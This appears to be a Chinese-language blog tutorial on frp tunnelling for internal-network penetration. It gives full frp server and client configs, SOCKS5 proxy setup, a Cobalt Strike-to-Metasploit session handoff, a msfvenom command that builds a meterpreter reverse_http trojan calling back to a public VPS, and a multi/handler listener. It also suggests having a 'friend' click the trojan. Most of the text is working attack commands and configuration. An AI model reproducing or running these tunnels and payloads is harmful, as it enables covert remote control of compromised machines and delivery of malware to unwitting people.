内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf

前言

这篇文章介绍如何使用frp建立端口转发实现本地kali在公网ssh、本地msf在公网反弹shell;已经上线CS怎么联动本地msf

frp基础

1. 下载

下载地址

linux版在kali用,windows版在\/ps用

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf

2. kali设置代理

vi /etc/proxychains4.conf

socks5 1.166.166.6 7777

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf1

使用的时候可以在命令前加proxychains

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf2

3. msf设置代理

setg Proxies socks5:1.166.166.6:7777
setg ReverseAllowProxy true

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf3

4. windows设置代理

使用Proxifier工具

一级代理

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf4

1. \/PS配置服务端frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7000

运行

frps.exe -c frps.ini

2. 内网机器配置客户端frpc.ini

# frpc.ini
[common]
server_addr = 1.166.166.6
server_port = 7000
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5

运行

frpc.exe -c frpc.ini

3. 使用代理

ssh端口转发、msf反弹shell的端口转发—代理配置

在环境中,\/PS起到了桥梁的作用,使得两个内网可以相互通信

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf5

1. 环境描述

1.1 攻击目标内网

1.2 攻击桥梁\/PS(windows),ip:1.166.166.6

1.3 本地机器kali linux,ip:10.1.0.4

1.4 工具:frp

2. 服务端配置

\/PS为服务端,假设ip为1.166.166.6

将下载的文件放在\/ps,编辑frps.ini文件配置

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf6

[common]

bind_port = 60121
dashboard_port = 88
dashboard_user = admin
dashboard_pwd = zcv2!#sWE3x

参数说明:

[common] # 名字
bind_port = port # 指的是frp的服务端端口,用来和客户端kali建立连接
dashboard_port = port # 可视化监控平台的端口,访问这个端口会得到一个网页版的监控
# http://1.166.166.6:88
dashboard_user = admin # 网页版的登录用户名
dashboard_pwd = zcv2!#sWE3x # 网页版的登录密码

配置好之后保存,进行运行

frps.exe -c frps.ini

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf7

3. 客户端配置

将文件放进kali,解压命令

tar -zxvf frp_0.36.2_linux_amd64.tar.gz

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf8

配置kali,让在本地内网的kali,也能使用公网的IP进行访问,客户端的配置文件为frpc.ini

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf9

[common]
server_addr = 1.15.107.44
server_port = 60121

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 60122
use_compression = true

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 1234
remote_port = 60123

参数说明

[common]名称
server_addr = 1.166.166.6 # 服务器IP
server_port = 60121 # \/PS的端口,用来建立连接

[ssh] # 配置ssh登录的端口转发
type = tcp # 连接方式为TCP的方式
local_ip = 127.0.0.1 # 将本地的IP映射出去
local_port = 22 # 本地的端口为22
remote_port = 60122 # 映射的端口为60122,本地端口22映射到\/PS的60122
use_compression = true

[msf] # 配置msf的监听端口转发
type = tcp # 连接方式
local_ip = 127.0.0.1 # 本地IP
local_port = 1234 # 监听本地的端口
remote_port = 60123  # 映射的\/PS端口为60123,本地端口1234映射到\/PS的60123

在kali中运行

./frpc -c frpc.ini

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf10

4. 访问一下frp的web管理页面

访问http://1.166.166.6:88,输入用户名密码登录

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf11

可以观察到流量的情况

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf12

5. 测试效果

ssh远程kali,前提是kali开启了远程连接

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf13

CS联动MSF

将CS已上线的机器进行反弹到本地MSF

1. 在CS中新建一个监听

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf14

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf15

点击Save保存

2. kali msf设置监听

由于上面frpc.ini配置的msf的1234端口映射到\/ps的60123

所以应该监听本地的1234端口,这里要写reverse_http,与CS对应

msfconsole -x “use exploit/multi/handler; set payload windows/meterpreter/reverse_http; set lhost 127.0.0.1; set lport 1234; exploit -j; “

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf16

3. CS中选择要联动MSF的会话,右键–增加会话–选择CS-MSF

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf17

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf18

MSF上线!

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf19

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf20

内网MSF反弹内网shell

1. 生成msf木马

msfvenom -p windows/meterpreter/reverse_http LHOST=1.15.107.44 LPORT=60123 -f exe > zf.exe

因为生成的木马由内网机器运行,内网机器只能访问\/PS,不能直接访问本地的kali,所以LHOST是\/ps,LPORT也是kali映射到\/ps的端口

2. 设置监听

这里和CS联动msf的时候一样

设置监听的时候要考虑:1234是本地监听的端口,60123是\/ps的端口,60123的数据转发到kali的1234

msfconsole -x “use exploit/multi/handler; set payload windows/meterpreter/reverse_http; set lhost 127.0.0.1; set lport 1234; exploit -j; “

3. 找一个小伙伴的电脑点一下木马

kali上线

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf21

总结

内网渗透中隧道时必不可少的,frp搭建隧道相对比较稳定,功能也更加强大,常用的还有EW,都可以进行多级代理

参考

http://cn-sec.com/archives/80364.html

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
大佬不来一句? 抢沙发

请登录后发表评论